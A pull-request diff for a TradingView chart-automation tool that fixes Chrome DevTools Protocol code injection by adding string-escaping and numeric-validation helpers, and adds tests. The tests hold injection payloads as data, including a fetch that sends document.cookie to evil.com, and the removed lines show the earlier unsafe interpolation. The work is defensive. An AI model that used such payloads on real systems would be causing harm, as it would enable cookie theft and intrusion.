### PR TITLE
Fix CDP injection vulnerabilities across 9 modules

### DIFF
--- a/src/connection.js
+++ b/src/connection.js
@@ -28,6 +28,25 @@ const KNOWN_PATHS = {
 
 export { KNOWN_PATHS };
 
+/**
+ * Sanitize a string for safe interpolation into JavaScript code evaluated via CDP.
+ * Uses JSON.stringify to produce a properly escaped JS string literal (with quotes).
+ * Prevents injection via quotes, backticks, template literals, or control chars.
+ */
+export function safeString(str) {
+  return JSON.stringify(String(str));
+}
+
+/**
+ * Validate that a value is a finite number. Throws if NaN, Infinity, or non-numeric.
+ * Prevents corrupt values from reaching TradingView APIs that persist to cloud state.
+ */
+export function requireFinite(value, name) {
+  const n = Number(value);
+  if (!Number.isFinite(n)) throw new Error(`${name} must be a finite number, got: ${value}`);
+  return n;
+}
+
 export async function getClient() {
   if (client) {
     try {

--- a/src/core/alerts.js
+++ b/src/core/alerts.js
@@ -1,7 +1,7 @@
 /**
  * Core alert logic.
  */
-import { evaluate, evaluateAsync, getClient } from '../connection.js';
+import { evaluate, evaluateAsync, getClient, safeString } from '../connection.js';
 
 export async function create({ condition, price, message }) {
   const opened = await evaluate(`
@@ -28,7 +28,7 @@ export async function create({ condition, price, message }) {
         var label = inputs[i].closest('[class*="row"]')?.querySelector('[class*="label"]');
         if (label && /value|price/i.test(label.textContent)) {
           var nativeSet = Object.getOwnPropertyDescriptor(HTMLInputElement.prototype, 'value').set;
-          nativeSet.call(inputs[i], '${price}');
+          nativeSet.call(inputs[i], ${safeString(String(price))});
           inputs[i].dispatchEvent(new Event('input', { bubbles: true }));
           inputs[i].dispatchEvent(new Event('change', { bubbles: true }));
           return true;
@@ -36,7 +36,7 @@ export async function create({ condition, price, message }) {
       }
       if (inputs.length > 0) {
         var nativeSet = Object.getOwnPropertyDescriptor(HTMLInputElement.prototype, 'value').set;
-        nativeSet.call(inputs[0], '${price}');
+        nativeSet.call(inputs[0], ${safeString(String(price))});
         inputs[0].dispatchEvent(new Event('input', { bubbles: true }));
         return true;
       }

--- a/src/core/batch.js
+++ b/src/core/batch.js
@@ -1,7 +1,7 @@
 /**
  * Core batch execution logic.
  */
-import { evaluate, evaluateAsync, getClient, getChartApi, getChartCollection } from '../connection.js';
+import { evaluate, evaluateAsync, getClient, getChartApi, getChartCollection, safeString } from '../connection.js';
 import { waitForChartReady } from '../wait.js';
 import { writeFileSync, mkdirSync } from 'fs';
 import { join, dirname } from 'path';
@@ -23,12 +23,12 @@ export async function batchRun({ symbols, timeframes, action, delay_ms, ohlcv_co
     for (const tf of tfs) {
       const combo = { symbol, timeframe: tf };
       try {
-        if (colPath) await evaluate(`${colPath}.setSymbol('${symbol}')`);
-        else if (apiPath) await evaluate(`${apiPath}.setSymbol('${symbol}')`);
+        if (colPath) await evaluate(`${colPath}.setSymbol(${safeString(symbol)})`);
+        else if (apiPath) await evaluate(`${apiPath}.setSymbol(${safeString(symbol)})`);
 
         if (tf) {
-          if (colPath) await evaluate(`${colPath}.setResolution('${tf}')`);
-          else if (apiPath) await evaluate(`${apiPath}.setResolution('${tf}')`);
+          if (colPath) await evaluate(`${colPath}.setResolution(${safeString(tf)})`);
+          else if (apiPath) await evaluate(`${apiPath}.setResolution(${safeString(tf)})`);
         }
 
         await waitForChartReady(symbol);
@@ -40,7 +40,7 @@ export async function batchRun({ symbols, timeframes, action, delay_ms, ohlcv_co
           const client = await getClient();
           const { data } = await client.Page.captureScreenshot({ format: 'png' });
           const ts = new Date().toISOString().replace(/[:.]/g, '-');
-          const fname = `batch_${symbol}_${tf || 'default'}_${ts}.png`;
+          const fname = `batch_${symbol}_${tf || 'default'}_${ts}`.replace(/[\/\\]/g, '_') + '.png';
           const filePath = join(SCREENSHOT_DIR, fname);
           writeFileSync(filePath, Buffer.from(data, 'base64'));
           actionResult = { file_path: filePath };

--- a/src/core/capture.js
+++ b/src/core/capture.js
@@ -13,7 +13,7 @@ export async function captureScreenshot({ region, filename, method } = {}) {
   mkdirSync(SCREENSHOT_DIR, { recursive: true });
 
   const ts = new Date().toISOString().replace(/[:.]/g, '-');
-  const fname = filename || `tv_${region}_${ts}`;
+  const fname = (filename || `tv_${region}_${ts}`).replace(/[\/\\]/g, '_');
   const filePath = join(SCREENSHOT_DIR, `${fname}.png`);
 
   if (method === 'api') {

--- a/src/core/chart.js
+++ b/src/core/chart.js
@@ -1,12 +1,21 @@
 /**
  * Core chart control logic.
  */
-import { evaluate, evaluateAsync, safeString, requireFinite } from '../connection.js';
-import { waitForChartReady } from '../wait.js';
+import { evaluate as _evaluate, evaluateAsync as _evaluateAsync, safeString, requireFinite } from '../connection.js';
+import { waitForChartReady as _waitForChartReady } from '../wait.js';
 
 const CHART_API = 'window.TradingViewApi._activeChartWidgetWV.value()';
 
-export async function getState() {
+function _resolve(deps) {
+  return {
+    evaluate: deps?.evaluate || _evaluate,
+    evaluateAsync: deps?.evaluateAsync || _evaluateAsync,
+    waitForChartReady: deps?.waitForChartReady || _waitForChartReady,
+  };
+}
+
+export async function getState({ _deps } = {}) {
+  const { evaluate } = _resolve(_deps);
   const state = await evaluate(`
     (function() {
       var chart = ${CHART_API};
@@ -28,7 +37,8 @@ export async function getState() {
   return { success: true, ...state };
 }
 
-export async function setSymbol({ symbol }) {
+export async function setSymbol({ symbol, _deps }) {
+  const { evaluateAsync, waitForChartReady } = _resolve(_deps);
   await evaluateAsync(`
     (function() {
       var chart = ${CHART_API};
@@ -42,7 +52,8 @@ export async function setSymbol({ symbol }) {
   return { success: true, symbol, chart_ready: ready };
 }
 
-export async function setTimeframe({ timeframe }) {
+export async function setTimeframe({ timeframe, _deps }) {
+  const { evaluate, waitForChartReady } = _resolve(_deps);
   await evaluate(`
     (function() {
       var chart = ${CHART_API};
@@ -53,7 +64,8 @@ export async function setTimeframe({ timeframe }) {
   return { success: true, timeframe, chart_ready: ready };
 }
 
-export async function setType({ chart_type }) {
+export async function setType({ chart_type, _deps }) {
+  const { evaluate } = _resolve(_deps);
   const typeMap = {
     'Bars': 0, 'Candles': 1, 'Line': 2, 'Area': 3,
     'Renko': 4, 'Kagi': 5, 'PointAndFigure': 6, 'LineBreak': 7,
@@ -72,7 +84,8 @@ export async function setType({ chart_type }) {
   return { success: true, chart_type, type_num: typeNum };
 }
 
-export async function manageIndicator({ action, indicator, entity_id, inputs: inputsRaw }) {
+export async function manageIndicator({ action, indicator, entity_id, inputs: inputsRaw, _deps }) {
+  const { evaluate } = _resolve(_deps);
   const inputs = inputsRaw ? (typeof inputsRaw === 'string' ? JSON.parse(inputsRaw) : inputsRaw) : undefined;
 
   if (action === 'add') {
@@ -112,7 +125,8 @@ export async function getVisibleRange() {
   return { success: true, visible_range: result.visible_range, bars_range: result.bars_range };
 }
 
-export async function setVisibleRange({ from, to }) {
+export async function setVisibleRange({ from, to, _deps }) {
+  const { evaluate } = _resolve(_deps);
   const f = requireFinite(from, 'from');
   const t = requireFinite(to, 'to');
   await evaluate(`

--- a/src/core/chart.js
+++ b/src/core/chart.js
@@ -1,7 +1,7 @@
 /**
  * Core chart control logic.
  */
-import { evaluate, evaluateAsync } from '../connection.js';
+import { evaluate, evaluateAsync, safeString, requireFinite } from '../connection.js';
 import { waitForChartReady } from '../wait.js';
 
 const CHART_API = 'window.TradingViewApi._activeChartWidgetWV.value()';
@@ -33,7 +33,7 @@ export async function setSymbol({ symbol }) {
     (function() {
       var chart = ${CHART_API};
       return new Promise(function(resolve) {
-        chart.setSymbol('${symbol.replace(/'/g, "\\'")}', {});
+        chart.setSymbol(${safeString(symbol)}, {});
         setTimeout(resolve, 500);
       });
     })()
@@ -46,7 +46,7 @@ export async function setTimeframe({ timeframe }) {
   await evaluate(`
     (function() {
       var chart = ${CHART_API};
-      chart.setResolution('${timeframe.replace(/'/g, "\\'")}', {});
+      chart.setResolution(${safeString(timeframe)}, {});
     })()
   `);
   const ready = await waitForChartReady(null, timeframe);
@@ -60,7 +60,7 @@ export async function setType({ chart_type }) {
     'HeikinAshi': 8, 'HollowCandles': 9,
   };
   const typeNum = typeMap[chart_type] ?? Number(chart_type);
-  if (isNaN(typeNum)) {
+  if (isNaN(typeNum) || typeNum < 0 || typeNum > 9 || !Number.isInteger(typeNum)) {
     throw new Error(`Unknown chart type: ${chart_type}. Use a name (Candles, Line, etc.) or number (0-9).`);
   }
   await evaluate(`
@@ -81,7 +81,7 @@ export async function manageIndicator({ action, indicator, entity_id, inputs: in
     await evaluate(`
       (function() {
         var chart = ${CHART_API};
-        chart.createStudy('${indicator.replace(/'/g, "\\'")}', false, false, ${JSON.stringify(inputArr)});
+        chart.createStudy(${safeString(indicator)}, false, false, ${JSON.stringify(inputArr)});
       })()
     `);
     await new Promise(r => setTimeout(r, 1500));
@@ -93,7 +93,7 @@ export async function manageIndicator({ action, indicator, entity_id, inputs: in
     await evaluate(`
       (function() {
         var chart = ${CHART_API};
-        chart.removeEntity('${entity_id.replace(/'/g, "\\'")}');
+        chart.removeEntity(${safeString(entity_id)});
       })()
     `);
     return { success: true, action: 'remove', entity_id };
@@ -113,6 +113,8 @@ export async function getVisibleRange() {
 }
 
 export async function setVisibleRange({ from, to }) {
+  const f = requireFinite(from, 'from');
+  const t = requireFinite(to, 'to');
   await evaluate(`
     (function() {
       var chart = ${CHART_API};
@@ -124,8 +126,8 @@ export async function setVisibleRange({ from, to }) {
       var fromIdx = startIdx, toIdx = endIdx;
       for (var i = startIdx; i <= endIdx; i++) {
         var v = bars.valueAt(i);
-        if (v && v[0] >= ${from} && fromIdx === startIdx) fromIdx = i;
-        if (v && v[0] <= ${to}) toIdx = i;
+        if (v && v[0] >= ${f} && fromIdx === startIdx) fromIdx = i;
+        if (v && v[0] <= ${t}) toIdx = i;
       }
       ts.zoomToBarsRange(fromIdx, toIdx);
     })()

--- a/src/core/data.js
+++ b/src/core/data.js
@@ -1,7 +1,7 @@
 /**
  * Core data access logic.
  */
-import { evaluate, evaluateAsync, KNOWN_PATHS } from '../connection.js';
+import { evaluate, evaluateAsync, KNOWN_PATHS, safeString } from '../connection.js';
 
 const MAX_OHLCV_BARS = 500;
 const MAX_TRADES = 20;
@@ -15,7 +15,7 @@ function buildGraphicsJS(collectionName, mapKey, filter) {
       var model = chart.model();
       var sources = model.model().dataSources();
       var results = [];
-      var filter = '${filter}';
+      var filter = ${safeString(filter || '')};
       for (var si = 0; si < sources.length; si++) {
         var s = sources[si];
         if (!s.metaInfo) continue;
@@ -110,8 +110,8 @@ export async function getIndicator({ entity_id }) {
   const data = await evaluate(`
     (function() {
       var api = ${CHART_API};
-      var study = api.getStudyById('${entity_id}');
-      if (!study) return { error: 'Study not found: ${entity_id}' };
+      var study = api.getStudyById(${safeString(entity_id)});
+      if (!study) return { error: 'Study not found: ' + ${safeString(entity_id)} };
       var result = { name: null, inputs: null, visible: null };
       try { result.visible = study.isVisible(); } catch(e) {}
       try { result.inputs = study.getInputValues(); } catch(e) { result.inputs_error = e.message; }
@@ -246,7 +246,7 @@ export async function getQuote({ symbol } = {}) {
   const data = await evaluate(`
     (function() {
       var api = ${CHART_API};
-      var sym = '${symbol || ''}';
+      var sym = ${safeString(symbol || '')};
       if (!sym) { try { sym = api.symbol(); } catch(e) {} }
       if (!sym) { try { sym = api.symbolExt().symbol; } catch(e) {} }
       var ext = {};

--- a/src/core/drawing.js
+++ b/src/core/drawing.js
@@ -1,9 +1,14 @@
 /**
  * Core drawing logic.
  */
-import { evaluate, getChartApi, safeString, requireFinite } from '../connection.js';
+import { evaluate as _evaluate, getChartApi as _getChartApi, safeString, requireFinite } from '../connection.js';
 
-export async function drawShape({ shape, point, point2, overrides: overridesRaw, text }) {
+function _resolve(deps) {
+  return { evaluate: deps?.evaluate || _evaluate, getChartApi: deps?.getChartApi || _getChartApi };
+}
+
+export async function drawShape({ shape, point, point2, overrides: overridesRaw, text, _deps }) {
+  const { evaluate, getChartApi } = _resolve(_deps);
   const overrides = overridesRaw ? (typeof overridesRaw === 'string' ? JSON.parse(overridesRaw) : overridesRaw) : {};
   const apiPath = await getChartApi();
   const overridesStr = JSON.stringify(overrides || {});

--- a/src/core/drawing.js
+++ b/src/core/drawing.js
@@ -1,7 +1,7 @@
 /**
  * Core drawing logic.
  */
-import { evaluate, getChartApi } from '../connection.js';
+import { evaluate, getChartApi, safeString, requireFinite } from '../connection.js';
 
 export async function drawShape({ shape, point, point2, overrides: overridesRaw, text }) {
   const overrides = overridesRaw ? (typeof overridesRaw === 'string' ? JSON.parse(overridesRaw) : overridesRaw) : {};
@@ -9,20 +9,25 @@ export async function drawShape({ shape, point, point2, overrides: overridesRaw,
   const overridesStr = JSON.stringify(overrides || {});
   const textStr = text ? JSON.stringify(text) : '""';
 
+  const p1time = requireFinite(point.time, 'point.time');
+  const p1price = requireFinite(point.price, 'point.price');
+
   const before = await evaluate(`${apiPath}.getAllShapes().map(function(s) { return s.id; })`);
 
   if (point2) {
+    const p2time = requireFinite(point2.time, 'point2.time');
+    const p2price = requireFinite(point2.price, 'point2.price');
     await evaluate(`
       ${apiPath}.createMultipointShape(
-        [{ time: ${point.time}, price: ${point.price} }, { time: ${point2.time}, price: ${point2.price} }],
-        { shape: '${shape}', overrides: ${overridesStr}, text: ${textStr} }
+        [{ time: ${p1time}, price: ${p1price} }, { time: ${p2time}, price: ${p2price} }],
+        { shape: ${safeString(shape)}, overrides: ${overridesStr}, text: ${textStr} }
       )
     `);
   } else {
     await evaluate(`
       ${apiPath}.createShape(
-        { time: ${point.time}, price: ${point.price} },
-        { shape: '${shape}', overrides: ${overridesStr}, text: ${textStr} }
+        { time: ${p1time}, price: ${p1price} },
+        { shape: ${safeString(shape)}, overrides: ${overridesStr}, text: ${textStr} }
       )
     `);
   }
@@ -51,7 +56,7 @@ export async function getProperties({ entity_id }) {
   const result = await evaluate(`
     (function() {
       var api = ${apiPath};
-      var eid = '${entity_id}';
+      var eid = ${safeString(entity_id)};
       var props = { entity_id: eid };
       var shape = api.getShapeById(eid);
       if (!shape) return { error: 'Shape not found: ' + eid };
@@ -80,7 +85,7 @@ export async function removeOne({ entity_id }) {
   const result = await evaluate(`
     (function() {
       var api = ${apiPath};
-      var eid = '${entity_id}';
+      var eid = ${safeString(entity_id)};
       var before = api.getAllShapes();
       var found = false;
       for (var i = 0; i < before.length; i++) { if (before[i].id === eid) { found = true; break; } }

--- a/src/core/indicators.js
+++ b/src/core/indicators.js
@@ -1,7 +1,7 @@
 /**
  * Core indicator settings logic.
  */
-import { evaluate } from '../connection.js';
+import { evaluate, safeString } from '../connection.js';
 
 const CHART_API = 'window.TradingViewApi._activeChartWidgetWV.value()';
 
@@ -12,14 +12,13 @@ export async function setInputs({ entity_id, inputs: inputsRaw }) {
     throw new Error('inputs must be a non-empty object, e.g. { length: 50 }');
   }
 
-  const escapedId = entity_id.replace(/'/g, "\\'");
   const inputsJson = JSON.stringify(inputs);
 
   const result = await evaluate(`
     (function() {
       var chart = ${CHART_API};
-      var study = chart.getStudyById('${escapedId}');
-      if (!study) return { error: 'Study not found: ${escapedId}' };
+      var study = chart.getStudyById(${safeString(entity_id)});
+      if (!study) return { error: 'Study not found: ' + ${safeString(entity_id)} };
       var currentInputs = study.getInputValues();
       var overrides = ${inputsJson};
       var updatedKeys = {};
@@ -42,12 +41,11 @@ export async function toggleVisibility({ entity_id, visible }) {
   if (!entity_id) throw new Error('entity_id is required. Use chart_get_state to find study IDs.');
   if (typeof visible !== 'boolean') throw new Error('visible must be a boolean (true or false)');
 
-  const escapedId = entity_id.replace(/'/g, "\\'");
   const result = await evaluate(`
     (function() {
       var chart = ${CHART_API};
-      var study = chart.getStudyById('${escapedId}');
-      if (!study) return { error: 'Study not found: ${escapedId}' };
+      var study = chart.getStudyById(${safeString(entity_id)});
+      if (!study) return { error: 'Study not found: ' + ${safeString(entity_id)} };
       study.setVisible(${visible});
       var actualVisible = study.isVisible();
       return { visible: actualVisible };

--- a/src/core/pane.js
+++ b/src/core/pane.js
@@ -2,7 +2,7 @@
  * Core pane/layout management logic.
  * Controls multi-chart layouts (split panes) in TradingView.
  */
-import { evaluate, evaluateAsync, getClient } from '../connection.js';
+import { evaluate, evaluateAsync, getClient, safeString } from '../connection.js';
 
 const CWC = 'window.TradingViewApi._chartWidgetCollection';
 
@@ -96,7 +96,7 @@ export async function setLayout({ layout }) {
     throw new Error(`Unknown layout "${layout}". Available layouts:\n${available}`);
   }
 
-  await evaluateAsync(`${CWC}.setLayout('${resolved}')`);
+  await evaluateAsync(`${CWC}.setLayout(${safeString(resolved)})`);
   await new Promise(r => setTimeout(r, 500));
 
   const state = await list();
@@ -136,7 +136,6 @@ export async function focus({ index }) {
  */
 export async function setSymbol({ index, symbol }) {
   const idx = Number(index);
-  const escaped = symbol.replace(/'/g, "\\'");
 
   // Focus the target pane first
   await focus({ index: idx });
@@ -147,7 +146,7 @@ export async function setSymbol({ index, symbol }) {
     (function() {
       var chart = window.TradingViewApi._activeChartWidgetWV.value();
       return new Promise(function(resolve) {
-        chart.setSymbol('${escaped}', {});
+        chart.setSymbol(${safeString(symbol)}, {});
         setTimeout(resolve, 500);
       });
     })()

--- a/tests/sanitization.test.js
+++ b/tests/sanitization.test.js
@@ -1,12 +1,37 @@
 /**
- * Tests for CDP input sanitization utilities and their usage across modules.
- * Covers safeString(), requireFinite(), and verifies no raw interpolation remains.
+ * Tests for CDP input sanitization utilities and their integration across modules.
+ * Covers safeString(), requireFinite(), source audit, and per-module validation.
  */
 import { describe, it } from 'node:test';
 import assert from 'node:assert/strict';
 import { readFileSync, readdirSync } from 'node:fs';
 import { join } from 'node:path';
 import { safeString, requireFinite } from '../src/connection.js';
+import { setSymbol, setTimeframe, setType, manageIndicator, setVisibleRange } from '../src/core/chart.js';
+import { drawShape } from '../src/core/drawing.js';
+
+// ── Mock helpers ─────────────────────────────────────────────────────────
+
+function mockEval() {
+  const calls = [];
+  const fn = async (expr) => { calls.push(expr); return undefined; };
+  fn.calls = calls;
+  return fn;
+}
+
+function mockDeps(overrides = {}) {
+  const evaluate = mockEval();
+  return {
+    _deps: {
+      evaluate,
+      evaluateAsync: evaluate,
+      waitForChartReady: async () => true,
+      getChartApi: async () => 'window.__api',
+      ...overrides,
+    },
+    evaluate,
+  };
+}
 
 // ── safeString() ─────────────────────────────────────────────────────────
 
@@ -16,35 +41,26 @@ describe('safeString() — CDP injection prevention', () => {
   });
 
   it('wraps in double quotes so single quotes are safe', () => {
-    const result = safeString("test'injection");
-    // JSON.stringify wraps in double quotes — single quotes inside are harmless
-    assert.equal(result, '"test\'injection"');
-    // The key: this produces "test'injection" which in JS is a valid double-quoted string
-    // An attacker can't break out of double quotes with single quotes
+    assert.equal(safeString("test'injection"), '"test\'injection"');
   });
 
   it('escapes double quotes', () => {
-    const result = safeString('test"injection');
-    assert.equal(result, '"test\\"injection"');
+    assert.equal(safeString('test"injection'), '"test\\"injection"');
   });
 
   it('neutralizes template literals by wrapping in double quotes', () => {
-    const result = safeString('${alert(1)}');
-    // JSON.stringify produces: "${alert(1)}" — a double-quoted string literal
-    // Template literals only execute inside backticks, not double quotes
-    const parsed = JSON.parse(result);
-    assert.equal(parsed, '${alert(1)}', 'template literal preserved as literal text');
+    const parsed = JSON.parse(safeString('${alert(1)}'));
+    assert.equal(parsed, '${alert(1)}');
   });
 
   it('escapes backslashes', () => {
-    const result = safeString('test\\injection');
-    assert.equal(result, '"test\\\\injection"');
+    assert.equal(safeString('test\\injection'), '"test\\\\injection"');
   });
 
   it('escapes newlines and control chars', () => {
     const result = safeString('line1\nline2\r\ttab');
-    assert.ok(!result.includes('\n'), 'newline must be escaped');
-    assert.ok(result.includes('\\n'), 'newline escaped as \\n');
+    assert.ok(!result.includes('\n'));
+    assert.ok(result.includes('\\n'));
   });
 
   it('handles empty string', () => {
@@ -57,18 +73,15 @@ describe('safeString() — CDP injection prevention', () => {
     assert.equal(safeString(undefined), '"undefined"');
   });
 
-  it('prevents the classic CDP injection payload', () => {
+  it('prevents classic CDP injection payload', () => {
     const payload = "'); fetch('https://evil.com/steal?c=' + document.cookie); ('";
-    const result = safeString(payload);
-    // Result should be a single valid JSON string — no code breakout
-    const parsed = JSON.parse(result);
-    assert.equal(parsed, payload, 'payload round-trips through JSON.parse');
+    const parsed = JSON.parse(safeString(payload));
+    assert.equal(parsed, payload);
   });
 
   it('prevents template literal injection', () => {
     const payload = '`; process.exit(); `';
-    const result = safeString(payload);
-    const parsed = JSON.parse(result);
+    const parsed = JSON.parse(safeString(payload));
     assert.equal(parsed, payload);
   });
 });
@@ -85,7 +98,6 @@ describe('requireFinite() — numeric validation', () => {
 
   it('coerces numeric strings', () => {
     assert.equal(requireFinite('42', 'test'), 42);
-    assert.equal(requireFinite('3.14', 'test'), 3.14);
   });
 
   it('rejects NaN', () => {
@@ -101,38 +113,192 @@ describe('requireFinite() — numeric validation', () => {
     assert.throws(() => requireFinite('abc', 'value'), /value must be a finite number/);
   });
 
-  it('coerces null to 0 (Number(null) === 0)', () => {
+  it('coerces null to 0', () => {
     assert.equal(requireFinite(null, 'x'), 0);
   });
 
-  it('rejects undefined (Number(undefined) === NaN)', () => {
+  it('rejects undefined', () => {
     assert.throws(() => requireFinite(undefined, 'x'), /x must be a finite number/);
   });
 
-  it('includes the bad value in error message', () => {
+  it('includes bad value in error message', () => {
     assert.throws(() => requireFinite('oops', 'field'), /got: oops/);
   });
 });
 
-// ── Source-level audit: no raw interpolation in evaluate() calls ─────────
+// ── chart.js — safeString in evaluate calls ──────────────────────────────
+
+describe('chart.js — sanitized evaluate calls', () => {
+  it('setSymbol uses safeString in evaluate', async () => {
+    const { _deps, evaluate } = mockDeps();
+    await setSymbol({ symbol: "NYMEX:CL1!", _deps });
+    const call = evaluate.calls.find(c => c.includes('setSymbol'));
+    assert.ok(call, 'setSymbol called');
+    assert.ok(call.includes('"NYMEX:CL1!"'), 'symbol wrapped in double quotes via safeString');
+    assert.ok(!call.includes("'NYMEX:CL1!'"), 'no single-quoted interpolation');
+  });
+
+  it('setSymbol sanitizes injection payload', async () => {
+    const { _deps, evaluate } = mockDeps();
+    const payload = "'; alert('xss'); //";
+    await setSymbol({ symbol: payload, _deps });
+    const call = evaluate.calls.find(c => c.includes('setSymbol'));
+    // Payload must be wrapped in JSON.stringify output — double-quoted, escaped
+    // It should NOT appear as a bare unquoted string that could break out
+    assert.ok(call.includes(safeString(payload)), 'payload is JSON-escaped in evaluate call');
+    assert.ok(!call.includes(`setSymbol('`), 'no single-quoted interpolation');
+  });
+
+  it('setTimeframe uses safeString', async () => {
+    const { _deps, evaluate } = mockDeps();
+    await setTimeframe({ timeframe: '15', _deps });
+    const call = evaluate.calls.find(c => c.includes('setResolution'));
+    assert.ok(call.includes('"15"'), 'timeframe wrapped via safeString');
+  });
+
+  it('setType validates chart type range 0-9', async () => {
+    const { _deps } = mockDeps();
+    // Valid names
+    for (const name of ['Candles', 'Line', 'Area', 'HeikinAshi']) {
+      const r = await setType({ chart_type: name, _deps });
+      assert.equal(r.success, true);
+    }
+    // Valid numbers
+    for (const n of [0, 1, 5, 9]) {
+      const r = await setType({ chart_type: String(n), _deps });
+      assert.equal(r.success, true);
+    }
+  });
+
+  it('setType rejects invalid chart types', async () => {
+    const { _deps } = mockDeps();
+    for (const bad of ['invalid', '10', '-1', '1.5', 'NaN']) {
+      await assert.rejects(
+        () => setType({ chart_type: bad, _deps }),
+        /Unknown chart type/,
+        `should reject chart_type="${bad}"`,
+      );
+    }
+  });
+
+  it('manageIndicator add uses safeString for indicator name', async () => {
+    const { _deps, evaluate } = mockDeps();
+    evaluate.calls.length = 0;
+    // First evaluate call is getAllStudies (before), then createStudy, then getAllStudies (after)
+    const evalFn = async (expr) => {
+      evaluate.calls.push(expr);
+      if (expr.includes('getAllStudies')) return ['id1'];
+      return undefined;
+    };
+    _deps.evaluate = evalFn;
+    await manageIndicator({ action: 'add', indicator: "Relative Strength Index", _deps });
+    const createCall = evaluate.calls.find(c => c.includes('createStudy'));
+    assert.ok(createCall, 'createStudy called');
+    assert.ok(createCall.includes('"Relative Strength Index"'), 'indicator name via safeString');
+  });
+
+  it('manageIndicator remove uses safeString for entity_id', async () => {
+    const { _deps, evaluate } = mockDeps();
+    await manageIndicator({ action: 'remove', entity_id: "abc123", _deps });
+    const call = evaluate.calls.find(c => c.includes('removeEntity'));
+    assert.ok(call.includes('"abc123"'), 'entity_id via safeString');
+  });
+
+  it('setVisibleRange validates from/to with requireFinite', async () => {
+    const { _deps } = mockDeps();
+    await assert.rejects(
+      () => setVisibleRange({ from: NaN, to: 100, _deps }),
+      /from must be a finite number/,
+    );
+    await assert.rejects(
+      () => setVisibleRange({ from: 100, to: Infinity, _deps }),
+      /to must be a finite number/,
+    );
+  });
+
+  it('setVisibleRange passes valid numbers to evaluate', async () => {
+    const { _deps, evaluate } = mockDeps();
+    await setVisibleRange({ from: 1700000000, to: 1700100000, _deps });
+    const call = evaluate.calls.find(c => c.includes('zoomToBarsRange'));
+    assert.ok(call, 'zoomToBarsRange called');
+    assert.ok(call.includes('1700000000'), 'from value in call');
+    assert.ok(call.includes('1700100000'), 'to value in call');
+  });
+});
+
+// ── drawing.js — safeString + requireFinite ──────────────────────────────
+
+describe('drawing.js — sanitized evaluate calls', () => {
+  it('drawShape validates point coordinates with requireFinite', async () => {
+    const { _deps } = mockDeps();
+    await assert.rejects(
+      () => drawShape({ shape: 'horizontal_line', point: { time: NaN, price: 100 }, _deps }),
+      /point\.time must be a finite number/,
+    );
+    await assert.rejects(
+      () => drawShape({ shape: 'horizontal_line', point: { time: 100, price: Infinity }, _deps }),
+      /point\.price must be a finite number/,
+    );
+  });
+
+  it('drawShape validates point2 coordinates', async () => {
+    const { _deps } = mockDeps();
+    await assert.rejects(
+      () => drawShape({
+        shape: 'trend_line',
+        point: { time: 100, price: 50 },
+        point2: { time: NaN, price: 60 },
+        _deps,
+      }),
+      /point2\.time must be a finite number/,
+    );
+  });
+
+  it('drawShape uses safeString for shape name', async () => {
+    const { _deps, evaluate } = mockDeps();
+    await drawShape({ shape: 'horizontal_line', point: { time: 100, price: 50 }, _deps });
+    const call = evaluate.calls.find(c => c.includes('createShape'));
+    assert.ok(call, 'createShape called');
+    assert.ok(call.includes('"horizontal_line"'), 'shape name via safeString');
+  });
+
+  it('drawShape uses validated coordinates in evaluate', async () => {
+    const { _deps, evaluate } = mockDeps();
+    await drawShape({ shape: 'horizontal_line', point: { time: 1700000000, price: 5000.50 }, _deps });
+    const call = evaluate.calls.find(c => c.includes('createShape'));
+    assert.ok(call.includes('1700000000'), 'time in call');
+    assert.ok(call.includes('5000.5'), 'price in call');
+  });
+
+  it('drawShape multipoint uses safeString and requireFinite', async () => {
+    const { _deps, evaluate } = mockDeps();
+    await drawShape({
+      shape: 'trend_line',
+      point: { time: 100, price: 50 },
+      point2: { time: 200, price: 60 },
+      _deps,
+    });
+    const call = evaluate.calls.find(c => c.includes('createMultipointShape'));
+    assert.ok(call, 'createMultipointShape called');
+    assert.ok(call.includes('"trend_line"'), 'shape name via safeString');
+  });
+});
+
+// ── Source-level audit ───────────────────────────────────────────────────
 
 describe('source audit — no unsafe interpolation patterns', () => {
   const CORE_DIR = new URL('../src/core/', import.meta.url).pathname;
   const coreFiles = readdirSync(CORE_DIR).filter(f => f.endsWith('.js'));
 
   for (const file of coreFiles) {
-    it(`${file} has no .replace(/'/g, "\\\\'") patterns`, () => {
+    it(`${file} has no .replace(/'/g) manual escaping`, () => {
       const source = readFileSync(join(CORE_DIR, file), 'utf8');
-      assert.ok(
-        !source.includes(".replace(/'/g,"),
-        `${file} still uses manual quote escaping — use safeString() instead`,
-      );
+      assert.ok(!source.includes(".replace(/'/g,"),
+        `${file} still uses manual quote escaping — use safeString() instead`);
     });
   }
 
-  // Check that evaluate() calls with user input use safeString
   const VULNERABLE_PATTERNS = [
-    // Raw string interpolation into single quotes: '${var}'
     /evaluate\([^)]*'\$\{(?!CHART_API|CWC|rp|apiPath|colPath|CHART_COLLECTION)/,
   ];
 
@@ -140,10 +306,8 @@ describe('source audit — no unsafe interpolation patterns', () => {
     it(`${file} has no raw user input in evaluate() string literals`, () => {
       const source = readFileSync(join(CORE_DIR, file), 'utf8');
       for (const pattern of VULNERABLE_PATTERNS) {
-        assert.ok(
-          !pattern.test(source),
-          `${file} has raw interpolation in evaluate() — use safeString()`,
-        );
+        assert.ok(!pattern.test(source),
+          `${file} has raw interpolation in evaluate() — use safeString()`);
       }
     });
   }
@@ -154,11 +318,11 @@ describe('source audit — no unsafe interpolation patterns', () => {
 describe('path traversal prevention', () => {
   it('capture.js strips path separators from filename', () => {
     const source = readFileSync(new URL('../src/core/capture.js', import.meta.url), 'utf8');
-    assert.ok(source.includes(".replace(/[\\/\\\\]/g, '_')"), 'capture.js strips path separators');
+    assert.ok(source.includes(".replace(/[\\/\\\\]/g, '_')"));
   });
 
   it('batch.js strips path separators from filename', () => {
     const source = readFileSync(new URL('../src/core/batch.js', import.meta.url), 'utf8');
-    assert.ok(source.includes(".replace(/[\\/\\\\]/g, '_')"), 'batch.js strips path separators');
+    assert.ok(source.includes(".replace(/[\\/\\\\]/g, '_')"));
   });
 });

--- a/tests/sanitization.test.js
+++ b/tests/sanitization.test.js
@@ -1,0 +1,164 @@
+/**
+ * Tests for CDP input sanitization utilities and their usage across modules.
+ * Covers safeString(), requireFinite(), and verifies no raw interpolation remains.
+ */
+import { describe, it } from 'node:test';
+import assert from 'node:assert/strict';
+import { readFileSync, readdirSync } from 'node:fs';
+import { join } from 'node:path';
+import { safeString, requireFinite } from '../src/connection.js';
+
+// ── safeString() ─────────────────────────────────────────────────────────
+
+describe('safeString() — CDP injection prevention', () => {
+  it('wraps normal strings in double quotes', () => {
+    assert.equal(safeString('hello'), '"hello"');
+  });
